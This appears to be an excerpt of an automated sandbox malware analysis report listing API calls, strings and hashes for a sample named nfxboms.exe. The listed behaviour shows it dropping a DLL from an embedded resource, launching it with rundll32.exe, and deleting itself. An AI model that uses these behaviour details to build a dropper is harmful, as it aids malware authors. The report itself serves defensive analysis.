6D7FBC00.MFC42(?,?,?,0040498B,000000FF), ref: 004026BB
6D7FBC00.MFC42(?,?,?,0040498B,000000FF), ref: 004026CB
6D7FBC00.MFC42(?,?,?,0040498B,000000FF), ref: 004026DB
6D7FBC50.MFC42(?,?,?,0040498B,000000FF), ref: 004026E8
6D8003E0.MFC42(?,?,?,0040498B,000000FF), ref: 004026F7

Memory Dump Source

Source File: 00000004.00000002.1285440476.0000000000401000.00000080.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1285421899.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285459869.0000000000405000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285507874.0000000000406000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285526751.0000000000407000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285544000.0000000000408000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285571263.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_peks66Iy06.jbxd

Similarity

API ID: A420$D8003
String ID:
API String ID: 3465068534-0
Opcode ID: 73797ba87a622be385d98e4536f12e1290190033833ce099e9855b6aedb849fc
Instruction ID: d16fc65b1ff759d4bf2d112fd190ecce01b2d07838592e1474cafa958000d974
Opcode Fuzzy Hash: 73797ba87a622be385d98e4536f12e1290190033833ce099e9855b6aedb849fc
Instruction Fuzzy Hash: 320140B00087C19BD315EB25C40979BBBE4BBE9714F440E1EF5E6162C1CBB85648C696

Function 00401BE0 Relevance: 9.0, APIs: 6, Instructions: 38COMMON

Download Yara Rule

APIs

6D8014C0.MFC42(?,000003F5,?), ref: 00401BF3
6D8014C0.MFC42(?,000003EE,?,?,000003F5,?), ref: 00401C05
6D8014C0.MFC42(?,000003E8,?,?,000003EE,?,?,000003F5,?), ref: 00401C17
6D801960.MFC42(?,000003EF,?,?,000003E8,?,?,000003EE,?,?,000003F5,?), ref: 00401C29
6D801140.MFC42(?,?,0000000A,?,000003EF,?,?,000003E8,?,?,000003EE,?,?,000003F5,?), ref: 00401C32
6D801960.MFC42(?,000003F0,?,?,?,0000000A,?,000003EF,?,?,000003E8,?,?,000003EE,?,?), ref: 00401C44

Memory Dump Source

Source File: 00000004.00000002.1285440476.0000000000401000.00000080.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1285421899.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285459869.0000000000405000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285507874.0000000000406000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285526751.0000000000407000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285544000.0000000000408000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285571263.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_peks66Iy06.jbxd

Similarity

API ID: D8014$D801960$D801140
String ID:
API String ID: 3703784044-0
Opcode ID: cfde83c47ff25b013f24b5fb9812b7ebe0be881af1d191fad1845931f096e49f
Instruction ID: 93ee3fe985d7ce76ed5cd37f38fdc4d041633a02a5185305ce90021903040c5d
Opcode Fuzzy Hash: cfde83c47ff25b013f24b5fb9812b7ebe0be881af1d191fad1845931f096e49f
Instruction Fuzzy Hash: 6CF0BEB27902143BE202A651DCC2EBF626CEBD6B9AF01037EF700360C19AAC2A014275

Function 00403610 Relevance: 9.0, APIs: 6, Instructions: 37COMMON

Download Yara Rule

APIs

6D8014C0.MFC42(?,000003EE,?), ref: 00403622
6D8014C0.MFC42(?,000003FB,?,?,000003EE,?), ref: 00403634
6D8014C0.MFC42(?,000003F4,?,?,000003FB,?,?,000003EE,?), ref: 00403646
6D8014C0.MFC42(?,000003F3,?,?,000003F4,?,?,000003FB,?,?,000003EE,?), ref: 00403658
6D801960.MFC42(?,000003EF,?,?,000003F3,?,?,000003F4,?,?,000003FB,?,?,000003EE,?), ref: 0040366A
6D801960.MFC42(?,000003F0,?,?,000003EF,?,?,000003F3,?,?,000003F4,?,?,000003FB,?,?), ref: 0040367C

Memory Dump Source

Source File: 00000004.00000002.1285440476.0000000000401000.00000080.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1285421899.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285459869.0000000000405000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285507874.0000000000406000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285526751.0000000000407000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285544000.0000000000408000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285571263.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_peks66Iy06.jbxd

Similarity

API ID: D8014$D801960
String ID:
API String ID: 4101713411-0
Opcode ID: b5ef06bcced9b5675932e51068800d4f328651a0de4a6e600310cf605433ae4f
Instruction ID: 7d7aa8acedc914c8f7f252d341010923b6cabf8a586bbe7ebd9ee2e302cdfebb
Opcode Fuzzy Hash: b5ef06bcced9b5675932e51068800d4f328651a0de4a6e600310cf605433ae4f
Instruction Fuzzy Hash: 08F0BEB26902153BE202A621DC82FFF636CEBC5B44F05473EB785760C19FBC2A018325

Function 00402F00 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 53memorystringCOMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32(?), ref: 00402F09
lstrlen.KERNEL32(00402DDC,?,00402DDC,00407194), ref: 00402F2C
MultiByteToWideChar.KERNEL32(00000000,00000000,00402DDC,000000FF,?,00000001,?,00402DDC,00407194), ref: 00402F55
SysAllocString.OLEAUT32(00000000), ref: 00402F5F

Strings

NULL, xrefs: 00402F05

Memory Dump Source

Source File: 00000004.00000002.1285440476.0000000000401000.00000080.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1285421899.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285459869.0000000000405000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285507874.0000000000406000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285526751.0000000000407000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285544000.0000000000408000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285571263.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_peks66Iy06.jbxd

Similarity

API ID: AllocByteCharClearMultiStringVariantWidelstrlen
String ID: NULL
API String ID: 3257503732-324932091
Opcode ID: 2c32c68fdb7f477cd471d25b524953c9b06913d1421e61b9c9fbc39c3ea53eac
Instruction ID: d48dc8f015bb9ad4e3fe3b606f75ade0cd382acbba87cbd38ab65ded183ca584
Opcode Fuzzy Hash: 2c32c68fdb7f477cd471d25b524953c9b06913d1421e61b9c9fbc39c3ea53eac
Instruction Fuzzy Hash: 9801D272600616ABC7105F52CD84B5BBBB8EF413A4F108136FE04B7390E3B898018BE9

Function 004010C0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 51COMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 004010D9
srand.MSVCRT ref: 004010E0
rand.MSVCRT ref: 004010EF
rand.MSVCRT ref: 00401110

Strings

ekimhuqcroanflvzgdjtxypswb, xrefs: 004010CB

Memory Dump Source

Source File: 00000004.00000002.1285440476.0000000000401000.00000080.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1285421899.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285459869.0000000000405000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285507874.0000000000406000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285526751.0000000000407000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285544000.0000000000408000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285571263.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_peks66Iy06.jbxd

Similarity

API ID: rand$CountTicksrand
String ID: ekimhuqcroanflvzgdjtxypswb
API String ID: 3923125369-3762667353
Opcode ID: af64965fe20426d731e7306a6c52b6f3676ca0dad364db7fcac0bb6fbcf8137a
Instruction ID: b437bbb5ddae58e17e7d4b32f079fbf535bad8d5f4727950ce3f72a2bcf890de
Opcode Fuzzy Hash: af64965fe20426d731e7306a6c52b6f3676ca0dad364db7fcac0bb6fbcf8137a
Instruction Fuzzy Hash: 34F04436B052004BC204AA2D9D40A6FF797EBC8351F85043EFE89E3352C976980846BA

Function 00401020 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 13fileCOMMON

Download Yara Rule

APIs

6D7C39C0.MFC42(00000000), ref: 00401025
__p___argv.MSVCRT ref: 00401030
DeleteFileA.KERNEL32(?), ref: 0040103C

Strings

BA@, xrefs: 0040102A

Memory Dump Source

Source File: 00000004.00000002.1285440476.0000000000401000.00000080.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1285421899.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285459869.0000000000405000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285507874.0000000000406000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285526751.0000000000407000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285544000.0000000000408000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285571263.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_peks66Iy06.jbxd

Similarity

API ID: DeleteFile__p___argv
String ID: BA@
API String ID: 2264924877-333561704
Opcode ID: 262c5416b1a606b217bd8bab8b619a55629c1a105c500f2fded16c866b6fed0a
Instruction ID: aad79171df0669d425ced9ff3ed335880c2d281df381521b8290eacabdbfd62a
Opcode Fuzzy Hash: 262c5416b1a606b217bd8bab8b619a55629c1a105c500f2fded16c866b6fed0a
Instruction Fuzzy Hash: D7D0C9792106118FC7147F58E91DA4A7BA4EF89302B4540AAF601AB3A1CAB498408F94

Function 00403060 Relevance: 6.2, APIs: 4, Instructions: 176COMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32(?), ref: 004030F1
VariantClear.OLEAUT32(?), ref: 0040318F
VariantClear.OLEAUT32(?), ref: 0040319B
SysFreeString.OLEAUT32(?), ref: 0040323E

Memory Dump Source

Source File: 00000004.00000002.1285440476.0000000000401000.00000080.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1285421899.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285459869.0000000000405000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285507874.0000000000406000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285526751.0000000000407000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285544000.0000000000408000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285571263.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_peks66Iy06.jbxd

Similarity

API ID: ClearFreeStringVariant
String ID:
API String ID: 1438600931-0
Opcode ID: 36ddf7c9e64948429ea50c594583730548552646f732539940beb09dbb1102c1
Instruction ID: 37251e203aaafb338411583485349c6a70529d6897f4196c911f470311200aa0
Opcode Fuzzy Hash: 36ddf7c9e64948429ea50c594583730548552646f732539940beb09dbb1102c1
Instruction Fuzzy Hash: 8D6110B46083818FC300DFA8C884A1AFBE8BF89704F508D6EF89597350C779E949CB56

Function 00402850 Relevance: 6.1, APIs: 4, Instructions: 54COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 0040286D

Part of subcall function 00403F80: 6D809A60.MFC42(?,000000CB,00000002,00000009,00000000,00000000,?,00401F36), ref: 00403F92

6D7CEC00.MFC42(?), ref: 004028AF
6D7CEC00.MFC42 ref: 004028C7
CoUninitialize.OLE32 ref: 004028E3

Memory Dump Source

Source File: 00000004.00000002.1285440476.0000000000401000.00000080.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1285421899.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285459869.0000000000405000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285507874.0000000000406000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285526751.0000000000407000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285544000.0000000000408000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285571263.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_peks66Iy06.jbxd

Similarity

API ID: D809InitializeUninitialize
String ID:
API String ID: 4184929662-0
Opcode ID: dea62da469005834a17dcaf4a989a915fdff2ae1d3d4b724e7fed293f5c704ef
Instruction ID: a6f7315796581bb2d5abe88462ee4dad0f4ce63d180d3def42c8f6836305b1d2
Opcode Fuzzy Hash: dea62da469005834a17dcaf4a989a915fdff2ae1d3d4b724e7fed293f5c704ef
Instruction Fuzzy Hash: 5F1190B0504341AFC300EF64C909B4B7BE8BB88714F044A2EF899A33C1D7789904CBA6

Function 00403FA0 Relevance: 6.0, APIs: 4, Instructions: 36COMMON

Download Yara Rule

APIs

6D7D56F0.MFC42(?,?,?,?,?,?,?,?,00404838,000000FF), ref: 00403FC7
6D809A60.MFC42(?,?,?,?,000000D3,00000002,00000008,?,00000000), ref: 00403FE5
6D7CEC00.MFC42(?), ref: 00403FF8
6D7CA420.MFC42(?,?,?,?,?,?,00000008,?,00000000), ref: 0040400E

Memory Dump Source

Source File: 00000004.00000002.1285440476.0000000000401000.00000080.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1285421899.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285459869.0000000000405000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285507874.0000000000406000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285526751.0000000000407000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285544000.0000000000408000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285571263.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_peks66Iy06.jbxd

Similarity

API ID: A420D809
String ID:
API String ID: 2330412994-0
Opcode ID: bab0631a7cd3f2ee1a1cae18d2b9e26db3f3eb49dea1ffd19132274849109f0e
Instruction ID: b8dc7083480bc4708094733b35e4e89a4a97086a0659bf2509b7bb66655cd5a6
Opcode Fuzzy Hash: bab0631a7cd3f2ee1a1cae18d2b9e26db3f3eb49dea1ffd19132274849109f0e
Instruction Fuzzy Hash: 7B01A9B1248750ABD314EB44C942F4AB7D4AB94F14F40852EF659672C1C7B85904C7A7

Function 00403ED0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25COMMON

Download Yara Rule

APIs

6D7C2DD0.MFC42(00000040,?,?,?,00404C4A,000000FF), ref: 00403EE9
6D7C7F20.MFC42 ref: 00403F03

Strings

0?@, xrefs: 00403F08

Memory Dump Source

Source File: 00000004.00000002.1285440476.0000000000401000.00000080.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1285421899.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285459869.0000000000405000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285507874.0000000000406000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285526751.0000000000407000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285544000.0000000000408000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285571263.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_peks66Iy06.jbxd

Similarity

API ID:
String ID: 0?@
API String ID: 0-4113061678
Opcode ID: 8a7acfc78b9fe263d97fcbbf9cc9dcb08269914006500b81099803699076fa74
Instruction ID: dd62c5200595188f2f15a0fc69b55e0932859a66ba4cda06ce91d8cb1555c2c7
Opcode Fuzzy Hash: 8a7acfc78b9fe263d97fcbbf9cc9dcb08269914006500b81099803699076fa74
Instruction Fuzzy Hash: 2FE092F1A84A61DBD310EF188902B9A7AE4F784B60F404A3EF169E77C0E77C484187C6

Analysis Process: nfxboms.exePID: 7272, Parent PID: 1352COMMON

Execution Graph

Execution Coverage:	7%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	264
Total number of Limit Nodes:	2

Executed Functions

Function 004013D0 Relevance: 37.0, APIs: 14, Strings: 7, Instructions: 216
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindResourceA.KERNEL32(00000000,00000086,HTM), ref: 004013E4
LoadResource.KERNEL32(00000000,00000000), ref: 004013FC

Strings

WinSta0\Default, xrefs: 00401666
c:\%s, xrefs: 00401509
c:\windows\system32\rundll32.exe, xrefs: 004015A7
%s\%s.dll, xrefs: 0040155E
%s "%s",init %s, xrefs: 00401621
HTM, xrefs: 004013D8
D, xrefs: 0040165E

Memory Dump Source

Source File: 0000000A.00000002.1308430064.0000000000401000.00000080.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.1308414133.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1308470891.0000000000405000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1308487146.0000000000406000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1308503292.0000000000407000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1308537242.0000000000408000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1308651027.0000000000409000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1308698549.0000000000415000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1308790325.0000000000425000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_nfxboms.jbxd

Similarity

API ID: Resource$FindLoad
String ID: %s "%s",init %s$%s\%s.dll$D$HTM$WinSta0\Default$c:\%s$c:\windows\system32\rundll32.exe
API String ID: 2619053042-2457680838
Opcode ID: fdddb39bb3cb725529eaf3ce096bf9552d9a8ba29dd7300b0babee306d9bc285
Instruction ID: 5c017b3d947436da3a79cbd575b5788da6cc5bd4b656b3589a3b64b7cb9d4a99
Opcode Fuzzy Hash: fdddb39bb3cb725529eaf3ce096bf9552d9a8ba29dd7300b0babee306d9bc285
Instruction Fuzzy Hash: DA71E5716083806FD3218B24CC45BEB7BD5EB89704F00492DF6C9AB2D1DAB995098B9B

Function 00401690 Relevance: 27.1, APIs: 18, Instructions: 77
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

6D85A190.MFC42(00000000), ref: 004016B0
6D7D5BD0.MFC42 ref: 004016BA
__p___argv.MSVCRT ref: 004016BF
ExitProcess.KERNEL32 ref: 004016DE

Part of subcall function 00401220: 6D7C2DD0.MFC42(00100000), ref: 0040122F
Part of subcall function 00401220: __p___argv.MSVCRT ref: 00401253
Part of subcall function 00401220: __p___argv.MSVCRT ref: 00401274
Part of subcall function 00401220: Sleep.KERNEL32(00000064), ref: 00401286
Part of subcall function 00401220: GetTickCount.KERNEL32 ref: 004012CD
Part of subcall function 00401220: wsprintfA.USER32 ref: 004012EA
Part of subcall function 00401220: CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000002,00000080,00000000), ref: 0040130A
Part of subcall function 00401220: 6D7C2DD0.MFC42(00000000), ref: 00401313
Part of subcall function 00401220: Sleep.KERNEL32(00000064), ref: 00401321
Part of subcall function 00401220: WriteFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00401331
Part of subcall function 00401220: Sleep.KERNEL32(00000064), ref: 00401339

Part of subcall function 004019C0: 6D800310.MFC42(00000066,00000000,?,?,?,?,?,00000000,004047CD,000000FF,004016EF,00000000), ref: 004019E7
Part of subcall function 004019C0: 6D7C7F20.MFC42(00000066,00000000), ref: 004019F9
Part of subcall function 004019C0: 6D7C7F20.MFC42(00000066,00000000), ref: 00401A11
Part of subcall function 004019C0: 6D7C7F20.MFC42(00000066,00000000), ref: 00401A29
Part of subcall function 004019C0: 6D7C7F20.MFC42(00000066,00000000), ref: 00401A41
Part of subcall function 004019C0: 6D7C7F20.MFC42(00000066,00000000), ref: 00401A59
Part of subcall function 004019C0: 6D7C7F20.MFC42(00000066,00000000), ref: 00401A71
Part of subcall function 004019C0: 6D7C7F20.MFC42(00000066,00000000), ref: 00401A89
Part of subcall function 004019C0: 6D7D56F0.MFC42(00000066,00000000), ref: 00401AA1
Part of subcall function 004019C0: 6D7D56F0.MFC42(00000066,00000000), ref: 00401AB3
Part of subcall function 004019C0: 6D7D56F0.MFC42(00000066,00000000), ref: 00401AC3
Part of subcall function 004019C0: 6D7D56F0.MFC42(00000066,00000000), ref: 00401AD5
Part of subcall function 004019C0: 6D7D56F0.MFC42(00000066,00000000), ref: 00401AE5
Part of subcall function 004019C0: 6D7D5A80.MFC42(004073FC,00000066,00000000), ref: 00401AFC
Part of subcall function 004019C0: 6D7D5A80.MFC42(004073FC,004073FC,00000066,00000000), ref: 00401B08
Part of subcall function 004019C0: 6D7D5A80.MFC42(004070E8,004073FC,004073FC,00000066,00000000), ref: 00401B14
Part of subcall function 004019C0: 6D7D5A80.MFC42(004070E0,004070E8,004073FC,004073FC,00000066,00000000), ref: 00401B24
Part of subcall function 004019C0: 6D7C50F0.MFC42(004070E0,004070E8,004073FC,004073FC,00000066,00000000), ref: 00401B29
Part of subcall function 004019C0: 6D7CF390.MFC42(00000080,0000000E,00000080,004070E0,004070E8,004073FC,004073FC,00000066,00000000), ref: 00401B3A
Part of subcall function 004019C0: LoadIconA.USER32(00000000,00000080), ref: 00401B40

6D8009F0.MFC42 ref: 00401705
6D7CA420.MFC42 ref: 0040171C
6D7CA420.MFC42 ref: 00401730
6D7CA420.MFC42 ref: 00401744
6D7CA420.MFC42 ref: 00401758
6D7CA420.MFC42 ref: 0040176C
6D7C2C80.MFC42 ref: 00401780
6D7FBC50.MFC42 ref: 00401794
6D7FBC00.MFC42 ref: 004017A8
6D7FBC00.MFC42 ref: 004017BC
6D7FBC00.MFC42 ref: 004017D0
6D7FBC00.MFC42 ref: 004017E4
6D7FBC00.MFC42 ref: 004017F5
6D8003E0.MFC42 ref: 00401809

Memory Dump Source

Source File: 0000000A.00000002.1308430064.0000000000401000.00000080.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.1308414133.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1308470891.0000000000405000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1308487146.0000000000406000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1308503292.0000000000407000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1308537242.0000000000408000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1308651027.0000000000409000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1308698549.0000000000415000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1308790325.0000000000425000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_nfxboms.jbxd

Similarity

API ID: A420$Sleep__p___argv$File$A190CountCreateD8003D800310D8009ExitF390IconLoadProcessTickWritewsprintf
String ID:
API String ID: 693048296-0
Opcode ID: c799f09f8497bed147593227bf029dd3053d6bb179ea20caa85db19ddaaaa527
Instruction ID: 616903a36303fad059cf54e446dff4fbed7c69b0abb077ef7505e4f2811fcf63
Opcode Fuzzy Hash: c799f09f8497bed147593227bf029dd3053d6bb179ea20caa85db19ddaaaa527
Instruction Fuzzy Hash: 55315D740093C19AD334FB65C65DBDFBBE0AFE5308F04096EA58D162C2DB785548CA67

Function 004043EC Relevance: 16.6, APIs: 11, Instructions: 111
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__set_app_type.MSVCRT ref: 00404419
__p__fmode.MSVCRT ref: 0040442E
__p__commode.MSVCRT ref: 0040443C
__setusermatherr.MSVCRT ref: 00404468
_initterm.MSVCRT ref: 0040447E
__getmainargs.MSVCRT ref: 004044A1
_initterm.MSVCRT ref: 004044B1
GetStartupInfoA.KERNEL32(?), ref: 004044F0
GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 00404514
exit.MSVCRT ref: 00404524
_XcptFilter.MSVCRT ref: 00404536

Memory Dump Source

Source File: 0000000A.00000002.1308430064.0000000000401000.00000080.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.1308414133.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1308470891.0000000000405000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1308487146.0000000000406000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1308503292.0000000000407000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1308537242.0000000000408000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1308651027.0000000000409000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1308698549.0000000000415000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1308790325.0000000000425000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_nfxboms.jbxd

Similarity

API ID: _initterm$FilterHandleInfoModuleStartupXcpt__getmainargs__p__commode__p__fmode__set_app_type__setusermatherrexit
String ID:
API String ID: 801014965-0
Opcode ID: 06df12e95e92e3eb90a3e8b97be51bae533ac44a46cc44ada275256ec1e1c751
Instruction ID: b84817577bdd794c3584b55ee7e6e144752272faa3ca625d9eeea178d453bb24
Opcode Fuzzy Hash: 06df12e95e92e3eb90a3e8b97be51bae533ac44a46cc44ada275256ec1e1c751
Instruction Fuzzy Hash: BB416AB1C04748AFDB20DFA4DD45A6A7BB8EB49714B20027EE651B72E1D7385840CF69

Function 00401020 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 13
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

6D7C39C0.MFC42(00000000), ref: 00401025
__p___argv.MSVCRT ref: 00401030
DeleteFileA.KERNELBASE(?), ref: 0040103C

Strings

BA@, xrefs: 0040102A

Memory Dump Source

Source File: 0000000A.00000002.1308430064.0000000000401000.00000080.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.1308414133.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1308470891.0000000000405000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1308487146.0000000000406000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1308503292.0000000000407000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1308537242.0000000000408000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1308651027.0000000000409000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1308698549.0000000000415000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1308790325.0000000000425000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_nfxboms.jbxd

Similarity

API ID: DeleteFile__p___argv
String ID: BA@
API String ID: 2264924877-333561704
Opcode ID: 262c5416b1a606b217bd8bab8b619a55629c1a105c500f2fded16c866b6fed0a
Instruction ID: aad79171df0669d425ced9ff3ed335880c2d281df381521b8290eacabdbfd62a
Opcode Fuzzy Hash: 262c5416b1a606b217bd8bab8b619a55629c1a105c500f2fded16c866b6fed0a
